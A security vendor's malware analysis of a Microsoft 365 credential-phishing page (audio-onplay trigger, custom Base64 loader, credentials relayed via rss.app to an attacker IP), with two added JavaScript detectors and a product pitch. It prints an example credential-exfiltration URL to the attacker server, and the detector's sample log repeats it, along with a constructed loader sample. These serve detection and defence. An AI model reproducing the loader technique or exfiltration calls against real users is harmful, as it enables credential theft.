On March 24 the odix team found a new malware sample that poses a unique threat to end users. The malware, which was discovered and sanitized by FileWall, steals the user's Microsoft 365 credentials and then posts the compromised data to an RSS feed. To add insult to injury, the RSS feed platform also appears to be the work of malicious actors.
The page loader looks identical to the Outlook loading page:
The HTML document has a small body that contains a JavaScript variable called nextHmtl (sic) whose value is 206912 characters long.
The document also contains an audio element:
After the page is loaded the source of the audio component is set to:
http://cache[.]waptrick[.]one/ringtones_new/fullmp3high/Ariana_Grande_Positions.mp3
For better or worse (depending on your musical preferences), the song is not played (if you want to listen to the original song, you can hear it here). The attacker uses the audio element's onplay event, which fires when playback starts, to trigger the decoding of the actual phishing page.
Why use the onplay event? To avoid detection!
If the code runs in an offline environment, which is common in dynamic analysis, the event is never triggered and the malicious code remains dormant.
The attacker implemented their own version of Base64 decoding instead of using the native JavaScript atob function (most likely to avoid detection). The attacker's version of Base64 is a bit different than standard Base64. For example, "odix" encoded with standard Base64 is "b2RpeAo="; if we encode "odix" with the attacker's version we get "b2RpeA==" (without the lower-case o). Our team believes this was done to evade analysis tools that spot Base64-encoded data, decode it and analyze it.
The attacker uses the decoder to decode the contents of the nextHmtl variable and creates a URL for the result using the URL.createObjectURL function. The user is then forwarded to the generated page with their email address passed as a parameter.
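The loader behaviour described above (a play event as the execution trigger, an oversized encoded string, a hand-rolled Base64 decoder and a createObjectURL hand-off) is a pattern a mail or web gateway can look for statically, before any script runs. The scanner below is an added example written for this post, not odix or FileWall code: it works on raw HTML text with no browser, the 50,000-character threshold and the "three indicators" cut-off are assumptions, and both sample documents are constructed (the blob is a repeated placeholder, the audio source is a placeholder host).

```javascript
// Added example (not odix/FileWall code): a static heuristic scanner for the
// loader described above. It inspects raw HTML text, needs no browser, and the
// sample documents at the bottom are constructed for the demonstration.

// Score an HTML document against four indicators of the loader technique:
//  1. an <audio> element whose play event runs script (the execution trigger)
//  2. a very large string literal assigned to a variable (the encoded page)
//  3. URL.createObjectURL used to turn decoded content into a navigable page
//  4. a hand-rolled Base64 alphabet present while atob() is never called
function scanLoaderHtml(html, opts = {}) {
  // 50,000 chars is an assumed threshold; the sample on the page held 206,912.
  const minBlobChars = opts.minBlobChars || 50000;
  const findings = [];

  // Indicator 1: inline onplay handler or addEventListener("play", ...).
  if (/<audio\b[^>]*\bonplay\s*=/i.test(html) ||
      /addEventListener\s*\(\s*["']play["']/i.test(html)) {
    findings.push("audio play event used as execution trigger");
  }

  // Indicator 2: var/let/const NAME = "<huge literal>". A Base64 blob contains
  // no quote characters, so a non-greedy match up to the same quote is enough.
  const assignRe = /\b(?:var|let|const)\s+([A-Za-z_$][\w$]*)\s*=\s*(["'`])([\s\S]*?)\2/g;
  let m;
  while ((m = assignRe.exec(html)) !== null) {
    if (m[3].length >= minBlobChars) {
      findings.push(`oversized string variable ${m[1]} (${m[3].length} chars)`);
    }
  }

  // Indicator 3: decoded content materialised as a blob: URL.
  if (/URL\.createObjectURL\s*\(/.test(html)) {
    findings.push("URL.createObjectURL used to build the next page");
  }

  // Indicator 4: the standard alphabet spelled out, with atob() absent,
  // suggests a custom decoder.
  const alphabet = /ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789/;
  if (alphabet.test(html) && !/\batob\s*\(/.test(html)) {
    findings.push("custom Base64 alphabet present, atob() never used");
  }

  // Three or more indicators together are treated as a loader; the cut-off is
  // an assumption for this example.
  return { suspicious: findings.length >= 3, findings };
}

// Constructed loader sample: same shape as the page describes, shrunk to a
// 56,000-char placeholder blob and a placeholder audio source.
const SAMPLE_LOADER = `<html><body>
<audio id="a" onplay="showPage()"></audio>
<script>
var nextHmtl = "${"PGh0bWw+".repeat(7000)}";
var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
function showPage() {
  var u = URL.createObjectURL(new Blob([decode(nextHmtl)], { type: "text/html" }));
  location.href = u + "#" + email;
}
document.getElementById("a").src = "http://example.invalid/song.mp3";
</script></body></html>`;

// Constructed benign sample: an audio tag and atob() on their own are normal.
const SAMPLE_BENIGN = `<html><body>
<audio src="intro.mp3" controls></audio>
<script>
const title = atob("T3V0bG9vaw==");
document.title = title;
</script></body></html>`;

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  console.log(scanLoaderHtml(SAMPLE_LOADER));
  console.log(scanLoaderHtml(SAMPLE_BENIGN));
}
```

Run with `node` to see the loader sample score four findings and the benign page none. None of the four indicators is malicious alone, which is why the verdict requires several of them together; the threshold is the knob to tune against a corpus of legitimate mail.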
Secondary page
The decoded JavaScript variable opens as a second page. This is the actual phishing page:
The page uses the data-bind attribute on many of its tags. This looks like code intended for the Knockout JavaScript library, but the library itself isn't loaded.
The attacker loads multiple images directly from Microsoft's CDNs; some sample URLs:
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_white_0ad43084800fd8b50a2576b5173746fe.png
https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_5bc252567ef56db648207d9c36a9d004.png
https://aadcdn.msauth.net/ests/2.1/content/images/ellipsis_grey_2b5d393db04a5e6e1f739cb266e65b4c.svg
https://outlook-1.cdn.office.net/assets/mail/pwa/v1/pngs/apple-touch-icon.png
The attackers use a decoy URL in the form.
While the form action is set to "https://getcontact[.]com/php", the submit event is overridden and no data is sent there.
Where is the data sent to?
The HTML form that the user fills in appears to post its data to https://getcontact[.]com/php:
But further analysis showed that the form is never submitted. A different function is executed when the victim clicks the submit button.
The user credentials are sent to an RSS creation API at https://rss[.]app.
Rss.app is a website that lets users create custom RSS feeds from other websites. The RSS feed created by the attacker, assuming the victim's email is "victim@contoso.com" and the password is "1234", is generated from the URL:
http://3[.]140[.]137[.]39/rss.php?u=victim@contoso.com&k=1234
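The exfiltration path above leaves a network trace: a credential pair travels in a query string, first to the RSS service and then, via the feed it builds, to the attacker's server. The detector below is an added example for this post, not odix or FileWall code. It parses constructed proxy log lines (the "timestamp client METHOD url status" format is made up), flags any request whose query string, or a URL nested inside one of its parameter values, carries an e-mail address together with a secret-like parameter, and uses the victim@contoso.com / 1234 values from the page's own example. The rss.app request path is a placeholder because the page does not name the endpoint, and it is an assumption that the feed source URL is passed to the service as a parameter.

```javascript
// Added example (not odix/FileWall code): detection logic for the credential
// hand-off described above, run over constructed proxy log lines. A request is
// flagged when its query string, or a URL nested inside one of its parameter
// values, carries an e-mail address together with a short secret-like value.

// An e-mail address in a parameter value. ':' and '/' are excluded before the
// '@' so a nested URL such as "http://host/x?u=a@b.c" is not taken for one.
const EMAIL_RE = /^[^\s@\/:]+@[^\s@\/]+\.[^\s@\/]+$/;
// Parameter names that commonly carry a password; "k" is the name seen in the
// feed URL on the page, the rest are assumed common aliases.
const SECRET_KEYS = new Set(["k", "p", "pw", "pass", "passwd", "password", "pwd"]);

// Collect [key, value] pairs from a URL's query string. A value that is itself
// an absolute URL is parsed recursively, because the feed source URL is assumed
// to be handed to the RSS service as a parameter.
function collectParams(urlString, depth = 0) {
  let url;
  try { url = new URL(urlString); } catch (e) { return []; }
  const pairs = [];
  for (const [key, value] of url.searchParams) {
    pairs.push([key.toLowerCase(), value]);
    if (depth < 2 && /^https?:\/\//i.test(value)) {
      pairs.push(...collectParams(value, depth + 1));
    }
  }
  return pairs;
}

// True when one URL looks like a credential hand-off.
function looksLikeCredentialExfil(urlString) {
  const pairs = collectParams(urlString);
  const hasEmail = pairs.some(([, v]) => EMAIL_RE.test(v));
  const hasSecret = pairs.some(([k, v]) => SECRET_KEYS.has(k) && v.length > 0);
  return hasEmail && hasSecret;
}

// Parse "timestamp client METHOD url status" lines (a constructed format) and
// return the entries worth an alert.
function scanProxyLog(logText) {
  const hits = [];
  for (const line of logText.split("\n")) {
    const parts = line.trim().split(/\s+/);
    if (parts.length < 5) continue;
    const [ts, client, method, url] = parts;
    if (looksLikeCredentialExfil(url)) hits.push({ ts, client, method, url });
  }
  return hits;
}

// Constructed log: the Microsoft CDN image and the mp3 from the page are benign
// noise, the third and fourth lines model the hand-off (the rss.app path is a
// placeholder, the page does not name the endpoint), the last is unrelated.
const SAMPLE_LOG = [
  "2021-03-24T10:01:02Z 10.0.0.5 GET https://logincdn.msauth.net/shared/1.0/content/images/ellipsis_635a63d500a92a0b8497cdc58d0f66b1.svg 200",
  "2021-03-24T10:01:09Z 10.0.0.5 GET http://cache.waptrick.one/ringtones_new/fullmp3high/Ariana_Grande_Positions.mp3 200",
  "2021-03-24T10:01:15Z 10.0.0.5 GET https://rss.app/PLACEHOLDER-ENDPOINT?url=http%3A%2F%2F3.140.137.39%2Frss.php%3Fu%3Dvictim%40contoso.com%26k%3D1234 200",
  "2021-03-24T10:01:16Z 10.0.0.5 GET http://3.140.137.39/rss.php?u=victim@contoso.com&k=1234 200",
  "2021-03-24T10:02:00Z 10.0.0.7 GET https://example.com/search?q=quarterly+report 200",
].join("\n");

if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  for (const hit of scanProxyLog(SAMPLE_LOG)) console.log("ALERT", hit);
}
```

The recursive parse is the important part: the request to the RSS service carries the attacker's feed URL percent-encoded inside a parameter, so a detector that only reads the outer query string would see an innocent-looking `url=` value and miss the credentials one level down. Matching on an e-mail plus a secret-like key, rather than on the specific host, also keeps the rule useful when the kit moves to a new server.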
When checking the rss.app website, it seems a bit odd…
There was no company information except for a contact email, "help@rss.app". The website's WHOIS information is hidden; that is not uncommon, but you wouldn't expect a web company to provide no information at all.
During our investigation we found code on Pastebin similar to the code in the sample. It was pasted in July 2019:
This new malware was blocked by FileWall
FileWall™ by odix offers an effective plugin based on its patented algorithm for eliminating malware hidden in files. Instead of trying to detect a known malware and block the file for the user, the FileWall™ service disarms malware and provides a sanitized file for safe usage. FileWall™ provides an effective malware prevention solution against both known and unknown malware attacks and handles all incoming email traffic including internal emails.
The FileWall™ advanced attachment security add-on for Microsoft 365 mail includes:
- Seamless deployment: one-click service activation
- Advanced email attachment handling for both internal and external senders
- FileWall™ doesn't harm or change any of Microsoft's sender-related security capabilities
- Deep file analysis capabilities (archives, password-protected files, etc.)
To read more Malware finds from the odix team visit https://www.odi-x.com/news/